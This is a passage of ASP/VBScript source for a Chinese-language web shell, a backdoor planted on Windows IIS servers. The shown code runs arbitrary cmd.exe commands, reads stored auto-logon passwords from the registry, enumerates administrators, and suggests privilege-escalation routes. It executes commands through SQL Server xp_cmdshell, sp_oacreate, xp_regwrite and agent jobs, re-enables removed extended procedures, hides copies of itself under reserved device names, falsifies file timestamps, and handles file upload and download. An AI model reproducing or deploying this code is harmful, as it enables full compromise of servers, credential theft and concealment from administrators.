    " if instr(Pathinfo,"pcanywhere") Then j"
  • 赛门铁克PcAnywhere控制_:支持
    " if instr(Pathinfo,"Kill") Then j"
  • Kill杀毒软件_:支持
    " if instr(Pathinfo,"kav") Then j"
  • 金山系列杀毒软件_:支持
    " if instr(Pathinfo,"antivirus") Then j"
  • 赛门铁克杀毒软件_:支持
    " if instr(Pathinfo,"rising") Then j"
  • 瑞星系列杀毒软件_:支持
    " paths=split(SoftPath,";") j"------------------------------------
    " j"系统当前_路径变量:
    " For i=Lbound(paths) to Ubound(paths) j"
  • "&paths(i)&"
    " next j"


    " pcnamekey="HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName" pcname=wsh.RegRead(pcnamekey) if pcname="" Then pcname="无法读_取主机名.
    " j"
  • 当前主_机名为:"&pcname&"
    " AdminNameKey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName" AdminName=wsh.RegRead(AdminNameKey) if adminname="" Then AdminName="Administrator" Response.Expires=0 on error resume next Set tN=server.createObject("Wscript.Network") Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group") For Each admin in objGroup.Members j "
  • 管理员用户:"&admin.Name&"
  • " Next if err then j"他奶奶的不行啊:Wscript.Network" end if j"
  • 默认管理"&"员用户名为:"&AdminName&"
    " isAutologin="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon" Autologin=Wsh.RegRead(isAutologin) if Autologin=0 or Autologin="" Then j"
  • 用户自_动登入:未启用
    " Else j"
  • 用户自_动登入:启用
    " Admin=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName") Passwd=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword") j"
  • 用户名:"&Admin&"
    " j"
  • 密码:"&Passwd&"
    " End if displogin=wsh.regRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DontDisplayLastUserName") If displogin="" or displogin=0 Then disply="是" else disply="否" j"
  • 是否显示上_次登入用户:"&disply&"
    " NTMLkey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\NTML" ntml=Wsh.RegRead(NTMLkey) if ntml="" Then Ntml=1 j"
  • Telnet Ntml设置为:"&ntml&"
    " hk="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count" kk=wsh.RegRead(hk) j"
  • 当前活动_网卡为:"&kk&"
    " j"------------------------------------

    " j"[服务器弱_点探测]

    " Set objComputer = GetObject("WinNT://.") Set sa = Server.CreateObject("Shell.Application") objComputer.Filter = Array("Service") On Error Resume Next For Each objService In objComputer if objService.Name="Serv-U" Then if objService.ServiceAccountName="LocalSystem" Then j"
  • 服务器中有_Serv-U安装,且以LocalSystem权限启动,可以考虑用su.exe工具提权
    " End if End if if lcase(objService.Name)="apache" Then if objService.ServiceAccountName="LocalSystem" Then If instr(Request.ServerVariables("SERVER_SOFTWARE"),"Apache") Then j"
  • 当前WEB服务器为Apache.可以直接提权
    " Else j"
  • 服务器中有_Apache服务存在,启动权限为LocalSystem,可以考虑PHP木马
    " End if end if End if if instr(lcase(objService.Name),"tomcat") Then if objService.ServiceAccountName="LocalSystem" Then j"
  • 服务器中有_Tomcat,且以LocalSystem权限启动,可以考虑使用Jsp木马提权
    " End if End if if instr(lcase(objService.Name),"winmail") Then if objService.ServiceAccountName="LocalSystem" Then j"
  • 服务器中有_Magic Winmail,且以LocalSystem权限启动,可以查找WebMail目录,并且写入PHP木马
    " End if End if Next Set fso=Server.Createobject("Scripting.FileSystemObject") Sysdrive=left(Fso.GetspecialFolder(2),2) servername=wsh.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName") If fso.FileExists(sysdriver&"\Documents And Settings\All Users\Application Data\Symantec\"&servername&".cif") Then j"
  • 发现_pcAnywhere密码文件,可以从默认目录下载并破解得到pcAnywhere密码" End if End Sub sub promyself() On Error Resume Next set f=fso.GetFile(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) if f.Attributes <> 39 then f.Attributes=39 end if set f=nothing end sub function sql() if session("login")="" then j"
    " else j"
    " end if if session("login")="" then j"
  • "&mName&"
    " Set ABC=New LBF:j ABC.ShowDriver():Set ABC=Nothing: j"
    N 站点根目录"&ef j cdx&""&cxd&" 本程序目录"&ef j cdx&""&cxd&" 回上级目录"&ef j cdx&""&cxd&" 新建--目錄"&ef j cdx&""&cxd&" 新建--文本"&ef j cdx&""&cxd&" 上传--文件"&ef j cdx&""&cxd&" 执行---CMD"&ef j cdx&""&cxd&" 可写--目录"&ef j cdx&""&cxd&" 脚本--探测"&ef j cdx&""&cxd&" 服务器打包"&ef j cdx&""&cxd&" 连接数据库"&ef j "
    " j cdx&""&cxd&" 用户__账号"&ef j cdx&""&cxd&" 端口__网络"&ef j cdx&""&cxd&" 组件__支持"&ef j cdx&""&cxd&" SQL-----SA"&ef j cdx&""&cxd&" SQL---管理"&ef j cdx&""&cxd&" 端口扫描器"&ef j cdx&""&cxd&" 搜索__文件"&ef&"" j"
    " j cdx&""&cxd&" 解锁本程序"&ef j cdx&""&cxd&" 建带点目录"&ef j cdx&""&cxd&" 属性--时间"&ef j cdx&""&cxd&" 文件--保护"&ef j cdx&""&cxd&" 不死--僵尸"&ef j cdx&""&cxd&" 同服--查询"&ef j cdx&""&cxd&" PR值--查询"&ef j cdx&""&cxd&" 数据--导出"&ef j cdx&""&cxd&" 程序--更新"&ef j cdx&""&cxd&" 退出--登陆
    " j "


    " '百度权重地址调用 'PR值调用地址 end function: Function Course() SI="
    " on error resume next for each obj in getObject("WinNT://.") err.clear if OBJ.StartType="" then SI=SI&"" end if if OBJ.StartType=2 then lx="自动" if OBJ.StartType=3 then lx="手动" if OBJ.StartType=4 then lx="禁用" if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then SI1=SI1&"" else SI2=SI2&"" end if next j SI&SI0&SI1&SI2&"
     "&obj.Name&" 系统用户(组)
     "&obj.Name&" "&obj.DisplayName&"
    [启动类型:"&lx&"] "&obj.path&"
     "&obj.Name&" "&obj.DisplayName&"
    [启动类型:"&lx&"] "&obj.path&"
    " End Function Function GetTheSizes(num) Dim i, arySize(4) arySize(0)="B" arySize(1)="KB" arySize(2)="MB" arySize(3)="GB" arySize(4)="TB" While(num / 1024 >= 1) num=Fix(num / 1024 * 100) / 100 i=i + 1 WEnd GetTheSizes=num&" "&arySize(i) End Function Function HtmlEncodes(str) If IsNull(str) Then Exit Function HtmlEncodes=Server.HTMLEncode(str) End Function Function lIl(stvb, nType, tru) If stvb = "" or IsNull(stvb) Then lIl = stvb Exit Function End If Dim SText, saText, aText, MText Dim itru, Midtru, Lentru, GetTextLen Lentru = Len(tru) For aText = 1 To Len(stvb) MText = LCase(Mid(stvb,aText,1)) saText = False For itru = 1 To Lentru Midtru = LCase(Mid(tru,itru,1)) If MText = Midtru Then saText = True GetTextLen = 0 If itru = 1 Then GetTextLen = Lentru Else GetTextLen = itru - 1 End If SText = Mid(tru,GetTextLen,1) & SText Exit For End If Next If saText = False Then SText = MText & SText End If Next lIl = SText End Function function downfile(path) response.clear set osm = createobject(obt(6,0)) osm.open osm.type = 1 osm.loadfromfile path sz=instrrev(path,"\")+1 response.addheader "content-disposition", "attachment; filename=" & mid(path,sz) response.addheader "content-length", osm.size response.charset = "utf-8" response.contenttype = "application/octet-stream" response.binarywrite osm.read response.flush osm.close set osm = nothing end function function htmlencode(s) if not isnull(s) then s = replace(s, ">", ">") s = replace(s, "<", "<") s = replace(s, chr(39), "'") s = replace(s, chr(34), """") s = replace(s, chr(20), " ") htmlencode = s end if end function Function UpFile() If Request("Action2")="Post" Then Set U=new UPC Set F=U.UA("LocalFile") UName=U.form("ToPath") If UName="" Or F.FileSize=0 then SI="

    " on error resume next Else F.SaveAs UName If Err.number=0 Then SI="

    " End if End If Set F=nothing Set U=nothing SI=SI&BackUrl if instr(UName,wwwroot)>0 then j "打开http://"&serveru&replace(replace(UName,wwwroot,""),"\","/")&"" end if j SI ShowErr() Response.End End If j"


    " End Function function cmd1shell():on error resume next if request("sp")<>"" then session("shellpath") = request("sp") shellpath=session("shellpath") if shellpath="" then shellpath = "cmd.exe" if request("cmd")<>"" then session("defcmd") = request("cmd") defcmd=session("defcmd") if defcmd="" then defcmd="set" if request("rwpath")<>"" then session("rwpath") = request("rwpath") rwpath=session("rwpath") if rwpath="" then rwpath=server.mappath(".") si="
    " rp1=" 可读写目录(用于回显)
    " si=si&"" si=si&rp1&"wscript"" checked>wscript" si=si&rp1&"wscript.shell"">wscript.shell" si=si&rp1&"wscript.shell.1"">wscript.shell.1" si=si&rp1&"shell.application"">shell.application" si=si&rp1&"shell.application.1"">shell.application.1" si=si&" " set fso=server.createobject("scripting.filesystemobject") sztempfile = rwpath&"\cmd.txt" select case request("cmdtype") case "wscript" set cm=server.createobject("wscript.shell") set dd=cm.exec(shellpath&" /c "&defcmd) aaa=dd.stdout.readall si=si&"" si=si&aaa si=si&chr(13)&"
    " case "wscript.shell","wscript.shell.1" on error resume next set ws=server.createobject(request("cmdtype")) call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true) set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0) aaa=server.htmlencode(ofilelcx.readall) ofilelcx.close call fso.deletefile(sztempfile, true) si=si&"" si=si&aaa si=si&chr(13)&"" case "shell.application","shell.application.1" set seshell=server.createobject(request("cmdtype")) seshell.ShellExecute shellpath," /c " & defcmd & " > " & sztempfile,"","open",0 si=si&"             



    " End function On Error Resume Next function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):On Error Resume Next:fso.DeleteFile(server.mappath("test.php")):On Error Resume Next:fso.DeleteFile(server.mappath("test.jsp")):On Error Resume Next:j"test.(aspx;php;jsp)删除完毕!":set fso=nothing:End function Function DbManager() SqlStr=Trim(Request.Form("SqlStr")) DbStr=Request.Form("DbStr") SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"
    " j SI:SI="" If Len(DbStr)>40 Then Set Conn=CreateObject(ObT(5,0)) Conn.Open DbStr Set Rs=Conn.OpenSchema(20) SI=SI&"" Rs.MoveFirst Do While Not Rs.Eof If Rs("TABLE_TYPE")="TABLE" then TName=Rs("TABLE_NAME") SI=SI&"" End If Rs.MoveNext Loop Set Rs=Nothing SI=SI&"

    [ del ]
    " SI=SI&""&TName&"
    " j SI:SI="" If Len(SqlStr)>10 Then If LCase(Left(SqlStr,6))="select" then SI=SI&"执行语句:"&SqlStr Set Rs=CreateObject("Adodb.Recordset") Rs.open SqlStr,Conn,1,1 FN=Rs.Fields.Count RC=Rs.RecordCount Rs.PageSize=20 Count=Rs.PageSize PN=Rs.PageCount Page=request("Page") If Page<>"" Then Page=Clng(Page) If Page="" Or Page=0 Then Page=1 If Page>PN Then Page=PN If Page>1 Then Rs.absolutepage=Page SI=SI&"" For n=0 to FN-1 Set Fld=Rs.Fields.Item(n) SI=SI&"" Set Fld=nothing Next SI=SI&"" Do While Not(Rs.Eof or Rs.Bof) And Count>0 Count=Count-1 Bgcolor="#EFEFEF" SI=SI&"" For i=0 To FN-1 If RC=1 Then ColInfo=HTMLEncode(Rs(i)) Else ColInfo=HTMLEncode(Left(Rs(i),50)) End If SI=SI&"" Next SI=SI&"" Rs.MoveNext Loop j SI:SI="" SqlStr=HtmlEnCode(SqlStr) SI=SI&"
    记录数:"&RC&" 页码:"&Page&"/"&PN If PN>1 Then SI=SI&" 首页 上一页 " If Page>8 Then:Sp=Page-8:Else:Sp=1:End if For i=Sp To Sp+8 If i>PN Then Exit For If i=Page Then SI=SI&i&" " Else SI=SI&""&i&" " End If Next SI=SI&" 下一页 尾页" End If SI=SI&"
    " Rs.Close:Set Rs=Nothing j SI:SI="" Else Conn.Execute(SqlStr) SI=SI&"SQL语句:"&SqlStr End If j SI:SI="" End If Conn.Close Set Conn=Nothing End If End Function Dim T1 Class UPC Dim D1,D2 Public Function Form(F) F=lcase(F) If D1.exists(F) then:Form=D1(F):else:Form="":end if End Function Public Function UA(F) F=lcase(F) If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if End Function Private Sub Class_Initialize Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName set D1=CreateObject(ObT(4,0)) if Request.TotalBytes<1 then Exit Sub set T1 = CreateObject(ObT(6,0)) T1.Type = 1 : T1.Mode =3 : T1.Open T1.Write Request.BinaryRead(Request.TotalBytes) T1.Position=0 : TDa =T1.Read : DStart = 1 DEnd = LenB(TDa) set D2=CreateObject(ObT(4,0)) vbCrlf = chrB(13) & chrB(10) set T2 = CreateObject(ObT(6,0)) TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1) TLen = LenB (TSt) DStart=DStart+TLen+1 while (DStart + 10) < DEnd DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3 T2.Type = 1 : T2.Mode =3 : T2.Open T1.Position = DStart T1.CopyTo T2,DIEnd-DStart T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312" TIn = T2.ReadText : T2.Close DStart = InStrB(DIEnd,TDa,TSt) FStart = InStr(22,TIn,"name=""",1)+6 FEnd = InStr(FStart,TIn,"""",1) UpName = lcase(Mid (TIn,FStart,FEnd-FStart)) if InStr (45,TIn,"filename=""",1) > 0 then set TFL=new FIF FStart = InStr(FEnd,TIn,"filename=""",1)+10 FEnd = InStr(FStart,TIn,"""",1) FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14 FEnd = InStr(FStart,TIn,vbCr) TFL.FileStart =DIEnd TFL.FileSize = DStart -DIEnd -3 if not D2.Exists(UpName) then D2.add UpName,TFL end if else T2.Type =1 : T2.Mode =3 : T2.Open T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3 T2.Position = 0 : T2.Type = 2 T2.Charset ="gb2312" SFV = T2.ReadText T2.Close if D1.Exists(UpName) then D1(UpName)=D1(UpName)&", "&SFV else D1.Add UpName,SFV end if end if DStart=DStart+TLen+1 wend TDa="" set T2 =nothing End Sub Private Sub Class_Terminate if Request.TotalBytes>0 then D1.RemoveAll:D2.RemoveAll set D1=nothing:set D2=nothing T1.Close:set T1 =nothing end if End Sub End Class fns=126 Class FIF dim FileSize,FileStart Private Sub Class_Initialize FileSize = 0 FileStart= 0 End Sub Public function SaveAs(F) dim T3 SaveAs=true if trim(F)="" or FileStart=0 then exit function set T3=CreateObject(ObT(6,0)) T3.Mode=3 : T3.Type=1 : T3.Open T1.position=FileStart T1.copyto T3,FileSize T3.SaveToFile F,2 T3.Close set T3=nothing SaveAs=false end function End Class Class LBF Dim CF Private Sub Class_Initialize SET CF=CreateObject(ObT(0,0)) End Sub Private Sub Class_Terminate Set CF=Nothing End Sub Function ShowDriver() For Each D in CF.Drives j cdx&" 本地磁盘 ("&D.DriveLetter&":)
    " j"" j"

    " j"

     Sql用户名:" j"" j" Sql密码:" j"" j"

     Sql服务器:" j"" j" Sql端口:" j"" j" " j"

    " else j"" j"" j"

    " j" 组件检测:

    " j"

    " j" 组件恢复:

    " j"

    " j" 系统命令: " j"" j"  " j"" j"

    " j"
    " j"

     执行语句:" j"" j"  " j"" j"

    " end if if request("sqlaaa")="login" then set adoconn=server.createobject("adodb.connection") adoconn.open "provider=sqloledb.1;data source=" & request.form("server") & "," & request.form("port") & ";password=" & request.form("pass") & ";uid=" & request.form("name") if err.number=-2147467259 then j"数据源连接错误,请检查!" response.end elseif err.number=-2147217843 then j"用户名密码错误错误,请检查!" response.end elseif err.number=0 then strquery="select @@version" set recresult = adoconn.execute(strquery) j"

    " if instr(recresult(0),"NT 5.0") then j"Windows 2000系统" session("system")="2000" elseif instr(recresult(0),"NT 5.1") then j"Windows xp系统" session("system")="xp" elseif instr(recresult(0),"NT 5.2") then j"Windows 2003系统" session("system")="2003" else j"其它操作系统" session("system")="no" end if strquery="select is_srvrolemember('sysadmin')" set recresult = adoconn.execute(strquery) if recresult(0)=1 then j"
    恭喜!SQL Server最高权限

    " session("pri")=1 else j"

    " session("pri")=0 end if session("login")="yes" session("name")=request.form("name") session("pass")=request.form("pass") session("server")=request.form("server") session("port")=request.form("port") j"" End if Elseif request("sqlaaa")="test" then if session("login")<>"" then j"

    " if session("system")="2000" then j"Windows 2000系统" elseif session("system")="xp" then j"Windows xp系统" elseif session("system")="2003" then j"Windows 2003系统" else j"其它操作系统" end if if session("pri")=1 then j"
    恭喜!SQL Server最高权限

    " else j"
    " end if set adoconn=server.createobject("adodb.connection") adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name") strquery="select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'" set recresult = adoconn.execute(strquery) j"" if recresult(0) then session("xp_cmdshell")=1 j"xp_cmdshell............. 存在!" else session("xp_cmdshell")=0 j"xp_cmdshell............. 不存在!" end if strquery="select count(*) from master.dbo.sysobjects where xtype='x' and name='sp_oacreate'" set recresult = adoconn.execute(strquery) if recresult(0) then j"
    sp_oacreate............. 存在!" session("sp_oacreate")=1 else j"
    sp_oacreate............. 不存在!" session("sp_oacreate")=0 end if strquery="select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'" set recresult = adoconn.execute(strquery) if recresult(0) then j"
    xp_regwrite............. 存在!" session("xp_regwrite")=1 else j"
    xp_regwrite............. 不存在!" session("xp_regwrite")=0 end if strquery="select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_servicecontrol'" set recresult = adoconn.execute(strquery) if recresult(0) then j"
    xp_servicecontrol....... 存在!

    " session("xp_servicecontrol")=1 else j"
    xp_servicecontrol....... 不存在!
    " session("xp_servicecontrol")=0 end if else j"" j"
    登陆超时" response.end end if elseif request("sqlaaa")="cmd" then if session("login")<>"" then if session("pri")=1 then if request("tool")="xp_cmdshell" then set adoconn=server.createobject("adodb.connection") adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name") if request.form("cmd")<>"" then strquery = "exec master.dbo.xp_cmdshell '" & request.form("cmd") & "'" set recresult = adoconn.execute(strquery) if not recresult.eof then do while not recresult.eof strresult = strresult & chr(13) & recresult(0) recresult.movenext loop end if set recresult = nothing j"
    利用"&request("tool")&"扩展执行  C:\windows\system32>"&request.form("cmd")&"
    " j"
    " end if elseif request("tool")="sp_oacreate" then set adoconn=server.createobject("adodb.connection") adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name") if request.form("cmd")<>"" then strquery = "create table [jnc](resulttxt nvarchar(1024) null);use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "&request("cmd")&" > 8617.tmp',0,true;bulk insert [jnc] from '8617.tmp' with (keepnulls);" adoconn.execute(strquery) strquery = "select * from jnc" set recresult = adoconn.execute(strquery) if not recresult.eof then do while not recresult.eof strresult = strresult & chr(13) & recresult(0) recresult.movenext loop end if set recresult = nothing j"
    利用"&request("tool")&"扩展执行  C:\windows\system32>"&request.form("cmd")&"
    " j"
    " strquery = "drop table [jnc];declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c del 8617.tmp'" adoconn.execute(strquery) end if elseif request("tool")="xp_regwrite" then if session("system")="2000" then path="c:\winnt\system32\ias\ias.mdb" else path="c:\windows\system32\ias\ias.mdb" end if set adoconn=server.createobject("adodb.connection") adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name") if request.form("cmd")<>"" then cmd=chr(34)&"cmd.exe /c "&request.form("cmd")&" > 8617.tmp"&chr(34) strquery = "create table [jnc](resulttxt nvarchar(1024) null);exec master..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',0;select * from openrowset('microsoft.jet.oledb.4.0',';database=" & path &"','select shell("&cmd&")');" adoconn.execute(strquery) strquery = "select * from openrowset('microsoft.jet.oledb.4.0',';database=" & path &"','select shell("&chr(34)&"cmd.exe /c copy 8617.tmp jnc.tmp"&chr(34)&")');bulk insert [jnc] from 'jnc.tmp' with (keepnulls);" set recresult = adoconn.execute(strquery) strquery="select * from [jnc];" set recresult = adoconn.execute(strquery) if not recresult.eof then do while not recresult.eof strresult = strresult & chr(13) & recresult(0) recresult.movenext loop end if set recresult = nothing j"
    利用"&request("tool")&"扩展执行  C:\windows\system32>"&request.form("cmd")&"
    " j"
    " strquery = "drop table [jnc];exec master..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=" & path &"','select shell("&chr(34)&"cmd.exe /c del 8617.tmp&&del jnc.tmp"&chr(34)&")');" adoconn.execute(strquery) end if elseif request("tool")="sqlserveragent" then set adoconn=server.createobject("adodb.connection") adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name") if request.form("cmd")<>"" then if session("sqlserveragent")=0 then strquery = "exec master.dbo.xp_servicecontrol 'start','sqlserveragent';" adoconn.execute(strquery) session("sqlserveragent")=1 end if strquery = "use msdb create table [jncsql](resulttxt nvarchar(1024) null) exec sp_delete_job null,'x' exec sp_add_job 'x' exec sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "&request.form("cmd")&"' exec sp_add_jobserver null,'x',@@servername exec sp_start_job 'x';" adoconn.execute(strquery) adoconn.execute(strquery) adoconn.execute(strquery) j"
    利用"&request("tool")&"扩展执行  C:\windows\system32>"&request.form("cmd")&"
    " j"
    " strquery = "use msdb drop table [jncsql];" adoconn.execute(strquery) end if elseif request("tool")="" then j"" end if else j"" end if else j"" j"
    登陆超时" response.end end if elseif request("sqlaaa")="resume" then if session("login")<>"" then set adoconn=server.createobject("adodb.connection") adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name") if session("xp_cmdshell")=0 then strquery="dbcc addextendedproc ('xp_cmdshell','xplog70.dll')" adoconn.execute(strquery) j"
    " elseif session("sp_oacreate")=0 then strquery="dbcc addextendedproc ('sp_oacreate','odsole70.dll')" adoconn.execute(strquery) j"
    " elseif session("xp_regwrite")=0 then strquery="dbcc addextendedproc ('xp_regwrite','xpstar.dll')" adoconn.execute(strquery) j"
    " elseif session("xp_servicecontrol")=0 then strquery="dbcc addextendedproc ('xp_servicecontrol','xprepl.dll')" adoconn.execute(strquery) j"
    " else j"
    " end if else j"" j"
    登陆超时" response.end end if elseif request("sqlaaa")="sql" then if session("login")<>"" then if request.form("sql")<>"" then set adoconn=server.createobject("adodb.connection") adoconn.open "provider=sqloledb.1;data source=" & session("server") & "," & session("port") & ";password=" & session("pass") & ";uid=" & session("name") strquery=request.form("sql") set recresult = adoconn.execute(strquery) if not recresult.eof then do while not recresult.eof strresult = strresult & chr(13) & recresult(0) recresult.movenext loop end if set recresult = nothing j"

    " end if else j"" j"
    登陆超时" response.end end if end if if request("sqlaaa")="logout" then set adoconn=nothing session("login")="" session("name")="" session("pass")="" session("server")="" session("port")="" session("system")="" session("pri")="" j"" end if end function Sub Message(state,msg,flag):j"
    " j state j"

    "&msg j"

    " If flag=0 Then j" " Else End if j"
    " End Sub Function Red(str) Red = "" & str & "" End Function function datess response.write "
    " response.write "路 径:(一定要以\结尾)
    " response.write "文件名称:
    " response.write "修改属性:(1为只读2为隐藏4为系统)
    " response.write "修改时间:
    " response.write "" response.write "
    " '获取提交的参数 set path=request.Form("path") set fileName=request.Form("filename") set newTime=request.Form("time") set attri=request.Form("attri") if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then '通过fso设置文件属性 Set fso=Server.CreateObject("Scripting.FileSystemObject") Set file=fso.getFile(path&fileName) file.attributes=attri '设置文件属性为隐藏+系统 '通过shell.Application修改文件的最后修改时间 Set shell=Server.CreateObject("Shell.Application") Set app_path=shell.NameSpace(server.mappath(".")) Set app_file=app_path.ParseName(fileName) app_file.Modifydate=newTime end if end function sub hiddenshell fpath=request.servervariables("path_translated") set fso=server.createobject("scripting.filesystemobject") pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9" rndpex=split(pex,"|")(rndnumber(0,17)) session("seljw")="" filepath1=server.mappath(".") filename1=right(fpath,len(fpath)-instrrev(fpath,"\")) url2=request.servervariables("url") url2=left(url2,instrrev(url2,"/"))&rndpex&"."&filename1 fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1 Set namesf=fso.GetFile("\\.\"&filepath1&"\"&rndpex&"."&filename1) namesf.attributes = 39 set fso=nothing set namesf=nothing j "

    " j "" end sub Function RndNumber(Min,Max) Randomize RndNumber=Int((Max - Min + 1) * Rnd() + Min) End Function Sub ScanDriveForm():On Error Resume Next:Dim FSO,DriveB Set FSO = Server.Createobject("Scripting.FileSystemObject") path_arr = vbcrlf&"c:\php\"&vbcrlf&"d:\Program Files\"&vbcrlf&"C:\Documents and Settings\All Users\Documents\"&vbcrlf&"C:\recycler\"&vbcrlf&"d:\recycler\"&vbcrlf&"e:\recycler\"&vbcrlf&"f:\recycler\"&vbcrlf&"c:\recycled\"&vbcrlf&"C:\wmpub\"&vbcrlf&"C:\360rec\"&vbcrlf&"C:\cache\"&vbcrlf&"C:\JPEGCapture\"&vbcrlf&"C:\Inetpub\"&vbcrlf&"c:\TDDOWNLOAD\"&vbcrlf&"d:\TDDOWNLOAD\"&vbcrlf&"e:\TDDOWNLOAD\"&vbcrlf&"e:\wwwroot\"&vbcrlf&"d:\wwwroot\"&vbcrlf&"C:\Program Files\"&vbcrlf&"c:\docume~1\alluse~1\Application Data\Symantec\pcAnywhere"&vbcrlf&"C:\Documents and Settings\All Users\桌面\"&vbcrlf&"c:\mysql\"&vbcrlf&"C:\windows\system32\spool\PRINTERS\"&vbcrlf&"C:\WINDOWS\IIS Temporary Compressed Files\"&vbcrlf&"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files"&vbcrlf&"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files"&vbcrlf&"C:\Documents and Settings\NetworkService\Local Settings\Temp"&vbcrlf&"C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files"&vbcrlf&"C:\Windwos\system32\inetsrv\data\"&vbcrlf&"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\"&vbcrlf&"C:\php\PEAR\"&vbcrlf&"C:\Program Files\Zend\ZendOptimizer-3.3.0\"&vbcrlf&"C:\Program Files\Common Files\"&vbcrlf&"C:\7i24.com\iissafe\log\"&vbcrlf&"C:\WINDOWS\7i24.com\FreeHost"&vbcrlf&"C:\RECYCLER"&vbcrlf&"C:\windows\temp\"&vbcrlf&"c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\"&vbcrlf&"C:\Program Files\Symantec AntiVirus\SAVRT\"&vbcrlf&"C:\~1 "&vbcrlf&"C:\System Volume Information "&vbcrlf&"C:\Program Files\Zend\ZendOptimizer-3.3.0\docs"&vbcrlf&"C:\Documents and Settings\All Users\DRM\"&vbcrlf&"C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection"&vbcrlf&"C:\Documents and Settings\All Users\Application Data\360safe\softmgr\"&vbcrlf&"c:\documents and settings\all users\application data\symantec\liveupdate\"&vbcrlf&"c:\HostMonitor\"&vbcrlf&"c:\program files\ggsafe\temp\"&vbcrlf&"C:\Program Files\freeime\skin\blueness"&vbcrlf&"C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\Cookie\"&vbcrlf j"
    " For Each DriveB in FSO.Drives j" " Next j" " j"
    盘符" j DriveB.DriveLetter j":类型" Select Case DriveB.DriveType Case 1: j"可移动" Case 2: j"本地硬盘" Case 3: j"网络磁盘" Case 4: j"CD-ROM" Case 5: j"RAM磁盘" Case else: j"未知类型" End Select j"
    Windows文件夹" j FSO.GetSpecialFolder(0) j"
    System32文件夹" j FSO.GetSpecialFolder(1) j"
    系统临时文件夹" j FSO.GetSpecialFolder(2) j"
    " j"

    " Set FSO=Nothing:End Sub:li=""""">eecamrex>""=a>"">x>""=eyaecux")) Sub ScFolder(folder):On Error Resume Next:folderArr = Split(folder,vbcrlf):For i = 0 To Ubound(folderArr): Dim FSO,OFolder,TempFolder,Scmsg,S: Set FSO = Server.Createobject("Scripting.FileSystemObject"): folder = folderArr(i): If FSO.FolderExists(folder) Then: Set OFolder = FSO.GetFolder(folder): Set TempFolders = OFolder.SubFolders: Scmsg = "
  • 指定文件夹根目录:" & ScReWr(folder): For Each S in TempFolders: Scmsg = Scmsg&"
  • 文件夹:" & ScReWr(S) : Next: Set TempFolders = Nothing: Set OFolder = Nothing:else: Scmsg = "
  • 文件夹:" & Red(folder & "不存在或无读权限!"): End if: Set FSO = Nothing:: Message "",Scmsg,1:On Error Resume Next:next: j"

